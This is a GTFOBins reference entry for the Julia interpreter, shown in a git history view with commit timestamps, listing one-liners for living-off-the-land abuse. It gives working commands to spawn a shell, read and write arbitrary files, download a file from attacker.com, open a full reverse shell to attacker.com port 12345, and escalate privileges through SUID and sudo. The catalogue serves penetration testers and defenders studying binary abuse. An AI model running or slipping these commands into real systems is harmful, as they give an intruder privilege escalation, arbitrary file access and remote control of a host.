GTFOBins.github.io/_gtfobins/julia.md

32 lines
1.1 KiB
Markdown
Raw Normal View History

2023-04-18 04:46:57 +02:00
---
functions:
shell:
2023-04-20 08:51:20 +02:00
- code: |
julia -e 'run(`/bin/sh`)'
2023-04-18 04:46:57 +02:00
file-read:
2023-04-20 08:51:20 +02:00
- code: |
export LFILE=file_to_read
julia -e 'print(open(f->read(f, String), ENV["LFILE"]))'
2023-04-18 04:46:57 +02:00
file-write:
2023-04-20 08:51:20 +02:00
- code: |
export LFILE=file_to_write
julia -e 'open(f->write(f, "DATA"), ENV["LFILE"], "w")'
2023-04-18 04:46:57 +02:00
file-download:
2023-04-20 08:51:20 +02:00
- code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
julia -e 'download(ENV["URL"], ENV["LFILE"])'
2023-04-18 04:46:57 +02:00
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
julia -e 'using Sockets; sock=connect(ENV["RHOST"], parse(Int64,ENV["RPORT"])); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'
suid:
2023-04-20 08:51:20 +02:00
- code: |
./julia -e 'run(`/bin/sh -p`)'
2023-04-18 04:46:57 +02:00
sudo:
2023-04-20 08:51:20 +02:00
- code: |
sudo julia -e 'run(`/bin/sh`)'
2023-04-18 04:46:57 +02:00
---